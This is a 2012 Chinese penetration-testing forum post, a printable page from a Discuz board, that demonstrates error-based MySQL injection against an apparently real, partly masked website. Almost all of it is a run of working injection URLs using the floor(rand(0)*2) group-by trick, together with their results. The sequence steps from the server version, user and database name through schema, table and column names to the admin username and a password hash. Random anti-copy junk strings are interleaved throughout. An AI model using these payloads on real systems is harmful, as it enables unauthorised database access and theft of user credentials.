中国网络渗透测试联盟

标题: php+mysql高级爆错注入经测算有效 [打印本页]
作者: admin    时间: 2012-9-13 17:52
标题: php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
! E6 M) D! ]9 P: O; V0 y! ]2 R+ {( n3 w# \) J
之前想找个测试 没想到这有 可以测试下做个记录而已 / P; \" ?2 E; G, T9 X

# n7 `$ b0 O6 c, d8 nhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0036 P* w7 R# ?9 K, n
/ G5 ?' l8 w& E$ U: M4 n4 G: O
/data0/htdocs/leqi_new/app/myapp.php
1 j  k1 w2 ]. z7 q( o* {. f& D! a  J4 s" u, r* d
或者
$ r0 @9 U# q$ C% Q) P2 N/ C1 d3 f& m: U* m7 G# O, O
/**********version()**********/ 5.1.49-log, \+ ~7 a) V3 e% B9 `
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' [  p/ {4 |; n2 o& Q9 A+ J2 e. w: |" Q& b* l& X
/**********user()**********/  - J2 ?# e! A( m: P' m4 ~5 c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- a7 k- K  ]7 _1 Q
  a/ T" [- f% ~  l$ Z- g/**********database()**********/  leqi9 N- w, t- M0 W0 [
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
$ M" r, q( g: f$ |8 v" F& k: s' f1 m; \1 X4 y! N6 `
/**********limit依次递归爆库**********/
% c, w# R# @; u. khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% P3 \$ ]( e% ?0 M( W/ E/ r  G
information_schema
9 u# [4 n. h8 h% Q8 T; d( P/ whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! E9 C3 v. ^% Z; Bleqi+ r3 Q" @1 u/ f$ P0 z5 N8 d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ i" g0 g; B  g0 e7 Q% Y9 k5 M* ctest
3 e$ g! B9 A# X/ q+ m+ M6 Q5 z
2 E* S# V- C: d3 V$ X/**********limit依次递归爆表名**********/
6 B3 ?. R( J' |4 ^6 b: [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
$ n' ?3 @$ l  {' t: rusers
; P& ^1 k6 _$ W- W$ N
4 q% R$ l  G3 ]# ~/**********limit依次递归爆字段名**********/
. [: N) N  F6 c0 F8 s6 ]) I1 Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 F4 N0 ?. {( w7 s# f0 v8 t" guser_id,username,nickname,passwd,group_id
, R' u) y# G" _, a7 |2 phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ b# ]4 b0 }$ ?! B
/wapc/5000_0005_0034 s# `0 U* ~! V# @  q+ r
11 21( g, z$ o, t( }" @7 o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
8 c" ?4 q; E. m" H4 o/wapc/5000_0005_0031 d& p/ O) L5 M8 T, O- ~4 _
11 341 351 361
* d6 t# C6 B$ [; J0 U, t/**********爆数据**********/) }! X8 B; c! X1 D, ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
3 |' |4 r" j. @# a3 badmin
: S* R& i# Q' w% V, j* thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23$ B* v6 {3 S7 O; X* W# {
6a8b4574ca231eb8bd52764d4978ffcd  S( |; R8 q/ n- ?$ j' f! Y  L
* k7 n2 I% r$ Z- u
, ?; H# @. z/ _1 c& E




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2